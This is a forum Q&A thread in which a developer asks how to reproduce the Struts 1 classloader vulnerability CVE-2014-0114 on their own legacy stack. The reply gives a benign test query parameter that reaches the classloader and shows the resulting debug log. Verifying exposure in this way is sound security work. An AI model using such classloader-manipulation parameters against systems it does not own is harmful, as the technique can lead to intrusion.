In Struts1, I heard that there is a classloader vulnerability issue which is cause by CVE-2014-0114. But I am unable to reproduce this respect to my project. Can anyone help me how to reproduce this issue. I googled but not get any procedure of reproducing.
I am using struts-1.1
, Jboss -4.2.3.GA
, Apache 2.2.0
, MySql 5.0.37
, JKMod
, JDK 1.6.0_12
, Ant 1.7.0
for my web project.
Try to invoke a URL which is mapped to a struts action (backed by an action form). The framework will try to populate your form bean from query parameters. So if you have a query parameter like ?class.classLoader.defaultAssertionStatus=true
, it translates to formBean.getClass().getClassLoader().setDefaultAssertionStatus(true)
.
If you have enabled debug logging, you would see the following messages:
2014-05-05 12:57:50,238 DEBUG [org.apache.struts.action.RequestProcessor] Populating bean properties from this request
2014-05-05 12:57:50,238 DEBUG [org.apache.commons.beanutils.BeanUtils] BeanUtils.populate(com.xxx.struts.demo.web.form.SimpleForm@71909bc, {class.classLoader.defaultAssertionStatus=[Ljava.lang.String;@a6b23fd4})
2014-05-05 12:57:50,238 DEBUG [org.apache.commons.beanutils.BeanUtils] setProperty(com.xxx.struts.demo.web.form.SimpleForm@71909bc, class.classLoader.defaultAssertionStatus, [true])
2014-05-05 12:57:50,246 DEBUG [org.apache.commons.beanutils.BeanUtils] Target bean = com.ibm.ws.classloading.internal.AppClassLoader@3ac10955
2014-05-05 12:57:50,246 DEBUG [org.apache.commons.beanutils.BeanUtils] Target name = defaultAssertionStatus
2014-05-05 12:57:50,250 DEBUG [org.apache.commons.beanutils.ConvertUtils] Convert string 'true' to class 'boolean'
2014-05-05 12:57:50,250 DEBUG [org.apache.commons.beanutils.ConvertUtils] Using converter org.apache.commons.beanutils.converters.BooleanConverter@de2943ef
2014-05-05 12:57:50,250 DEBUG [org.apache.commons.beanutils.PropertyUtils] setSimpleProperty: Invoking method public void java.lang.ClassLoader.setDefaultAssertionStatus(boolean) with value true (class java.lang.Boolean)